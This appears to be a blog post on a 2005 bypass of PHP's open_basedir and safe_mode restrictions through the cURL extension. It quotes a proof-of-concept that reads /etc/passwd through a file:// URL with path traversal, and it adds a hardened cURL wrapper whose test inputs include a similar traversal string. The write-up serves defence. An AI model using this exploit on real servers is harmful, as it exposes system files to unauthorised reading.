open_basedir / safe_mode bypass via GD / cURL
On Mon, 17 Oct 2005 22:55:26 +0200 a post on Full Disclosure came through to my inbox. "PHP Safedir Restriction Bypass Vulnerabilities" was its title and my reaction was weeee! After reading through the post I realized the vulnerabilities do not affect the core of PHP, but two extensions: GD and cURL. Excerpts from the post go as follows:
...
curl openbasedir and safemode bypass.
POC:
<?php
mkdir("./".$_SERVER["SCRIPT_NAME"]."?");
$ch = curl_init("file://".$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../../../../../etc/passwd");
$file=curl_exec($ch);
echo $file;
?>
I always wondered if such an attack was even possible, since I had an understanding that extensions are run under PHP's directives. But now this is interesting -- one has to wonder how many other PHP extensions are capable of bypassing safemode/openbasedir at this instant.
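The lesson from the PoC is that open_basedir and safe_mode are enforced by PHP's own file functions, not by libraries an extension links against, so they cannot be the only control between a user-supplied URL and the local filesystem. The wrapper below is an added example, not code from the original post or from the Full Disclosure author: it rejects anything other than http/https before calling cURL and then tells libcurl itself which protocols it may use, so a file:// URL is never opened by the extension regardless of the ini settings. The function name fetch_remote() and the sample URLs are assumptions constructed for the example.

```php
<?php
// Added example (not from the original post): a cURL wrapper that refuses
// non-HTTP(S) URLs both before and inside cURL, so open_basedir is never the
// only thing standing between a user-supplied URL and the local filesystem.
// fetch_remote() and the sample URLs below are constructed for this example.

function fetch_remote(string $url): string
{
    // First line of defence: parse the URL ourselves and allow only http/https
    // with a host component. file:// URLs fail here before cURL is involved.
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        throw new InvalidArgumentException("Rejected malformed URL: $url");
    }
    $scheme = strtolower($parts['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') {
        throw new InvalidArgumentException("Rejected scheme '$scheme' in: $url");
    }

    $ch = curl_init($url);
    // Second line of defence: restrict libcurl to HTTP(S) for the initial
    // request and for any redirect target. A file:// URL can then never be
    // opened by the extension, whatever PHP's open_basedir setting is.
    curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);

    $body = curl_exec($ch);
    if ($body === false) {
        $err = curl_error($ch);
        curl_close($ch);
        throw new RuntimeException("cURL failed for $url: $err");
    }
    curl_close($ch);
    return $body;
}

// Constructed inputs: the second has the same shape as the PoC in the post
// and is rejected before cURL is ever invoked.
$samples = [
    'https://example.com/',
    'file:///var/www/html/index.php?/../../../../etc/passwd',
];
foreach ($samples as $u) {
    try {
        $len = strlen(fetch_remote($u));
        echo "fetched $u ($len bytes)\n";
    } catch (Exception $e) {
        echo $e->getMessage(), "\n";
    }
}
```

Both checks are deliberate: the parse_url test documents the policy in PHP code and fails fast, while CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS make libcurl enforce the same policy, which also covers a remote server redirecting to a local scheme. Treating open_basedir and safe_mode as hardening rather than as a security boundary, and isolating PHP processes by OS-level permissions, is the durable fix.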